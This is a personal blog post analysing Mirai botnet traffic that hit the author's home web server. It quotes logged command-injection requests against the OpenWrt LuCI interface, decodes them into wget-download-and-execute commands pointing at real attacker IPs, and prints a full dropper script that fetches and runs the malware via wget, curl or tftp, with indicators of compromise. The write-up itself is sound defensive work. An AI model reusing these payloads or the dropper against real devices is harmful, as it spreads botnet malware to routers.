by Fred Theilig – @fmtheilig
I wrote the majority of this about a year ago and it sat in my drafts folder. I didn’t have the time nor mental energy to fully research the traffic. I started getting more of the same traffic, so I decided to get a move-on.
My home server has been pretty quiet as of late. Sometimes because it’s literally quiet. I will shut it down from time to time because the fans will spin up to max and stay there, making one hell of a racket. Shutting it down a couple days, or a week, seems to give it the rest it needs to behave better. But also, I just haven’t seen anything.
At ten past one on May 16th I got two suricata alerts: “ET HUNTING Suspicious Chmod Usage in URI (Inbound)”. The target was my web server and the IP addresses were 195.1.144.109 and 195.1.144.107, both in Oslo, Norway. The Apache logs showed:
GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://103.15.222.150/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk)This /cgi-bin/luci/ is new to me, but let’s decode the stuff between the parens:
cd /tmp; rm -rf shk; wget http://103.15.222.150/shk; chmod 777 shk; ./shk tplink; rm -rf shkNow let’s take a look at this dropper:
binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc"
server_ip="103.15.222.150"
binout="telnetdbot"
exec="your device just got infected to a bootnoot"rm -rf $binout
for arch in $binarys
do
rm -rf $arch
cd /tmp || cd /var || cd /dev; wget http://$server_ip/$arch -O $binout || curl -O $binout http://$server_ip/$arch || tftp -g -l $binout -r $arch $server_ip
chmod 777 $binout
status=./$binout $1
if [ "$status" = "$exec" ]; then
rm -rf $binout
break
fi
rm -rf $binout
doneWhat this does is download each of ten different versions of the payload using either wget, curl, or tftp from 103.15.222.150, saving as the name ‘telnetdbot’, into either /tmp, /var, or /dev (whichever they can change to), change permissions, then execute it. Pretty brute force, but we’ve seen this before. Using tftp is a new one, but it makes sense. No username or password.
I manually grabbed a copy of the x86 version of this malware. I keep my samples in a folder that clamav ignores. Downloading the version for a different architecture might be better opsec, but I have yet to accidentally run malware on my system. I will hold on to the binary for future analysis. So, what is this telnetdbot that promises to infect me to a “bootnoot”? It’s Mirai, specifically trojan.mirai/aiju.
On June 2nd IP 176.97.210.236 sent some very similar traffic my way:
"GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.238%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 26893 "-" "Go-http-client/1.1"This is pretty much the same as before, the only real difference is the IP address. Let’s take a closer look at the target of the GET method. Apparently /cgi-bin/luci/ is LuCI WebUI, a configuration interface for OpenWrt.
OpenWrt is an open source firmware project principally for replacing router operating systems on many brain-dead consumer routers, giving you much more power and control. I ran this prior to moving to pfSense. I had not heard of the LuCI WebUI before.
I grabbed this payload and of course it too is Mirai, but with a different hash. The shk dropper is run with ‘tplink’ as a parameter, which is passed the actual malware. TP-Link is a manufacturer of low end home routers, the kind one may install OpenWrt on, and probably should.
Let’s look at the numbers for the May 16 event:
195.1.144.109 Oslo, Norway (GlobalConnect AS)
195.1.144.107 Oslo, Norway (GlobalConnect AS)
103.15.222.150 Vietnam (TAN THANH AN INTERNATIONAL TRADE DEVELOPMENT COMPANY LIMITED)
Telnetdbot SHA256: 283a9d3db3201f027ff81ace1b3daca94ec6cdbd6cde3ca5154fb01053f854b2
First Submission: May 16
And now for June 2:
176.97.210.236 Frankfurt am Main, Hesse, Germany
176.97.210.238 Frankfurt am Main, Hesse, Germany
Telnetdbot SHA256: 29866f6d51987d93baadb3478ef1c2ae91172d1d74e1bbeaf7ea8d4efaf8da8d
First Submission: May 31
My Takeaway:
First, if you are not using CyberChef, you are missing out. It comes built in with my Security Onion instance but you can easily run it locally, or just use the url. It decodes obfuscated text like a champ.
Second, it is surprising how recent these specific malware variants have been seen. The first one hit my server on day one and the second on day three.
Perhaps most importantly, the LuCI configuration interface is a thing and it might still have a vulnerability. Don’t present the web interface to the public network. The Mirai binaries are pretty new, but is the vector of attack? Had I not a full time job, and a full time life outside of my job, I might have stood up an OpenWRT instance with LuCI to have a look. Can you run OpenWRT in a VM? I feel like this should be possible.
If you run LuCI on OpenWRT, take care. Update it to the latest release, don’t present the interface to the open internet, and verify that you haven’t been ‘infected to a bootnoot’.
Present Day Fred:
I got the same type of traffic several times over two or three days. Here is what I captured:
141.98.11.137 – – [05/May/2025:04:46:53 -0400] “GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F176.65.148.234%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1” 404 15527 “-” “Go-http-client/1.1”
Deobfuscated and formatted:
cd /tmp
rm -rf r
wget http://176.65.148.234/r
chmod 777 r
./r tplink
rm -rf r
The dropper code is basically the same as above except for minor changes and it does away with that bootnoot nonsense. The final binary is again a variant of Mirai. Now for the IP addresses:
Source traffic: 141.98.11.137 – Vilnius, Vilnius Vilnius City Municipality, Lithuania (UAB Host Baltic)
Dropper location: 176.65.148.234 – The Netherlands (Pfcloud UG)
Malware location: 212.81.47.226 – Sydney, New South Wales, Australia (Datacamp Limited)
Mirai SHA256:
071d1efd8562b639963130523730599daebcf1fbf9eb23afd214467f7cd0edff
So, my new conclusions are that as Mirai evolves, the attack stays mostly the same. Also, I really need to get to studying malware analysis. And finally, CyberChef is awesome. The internet is a shady neighborhood. Be careful out there.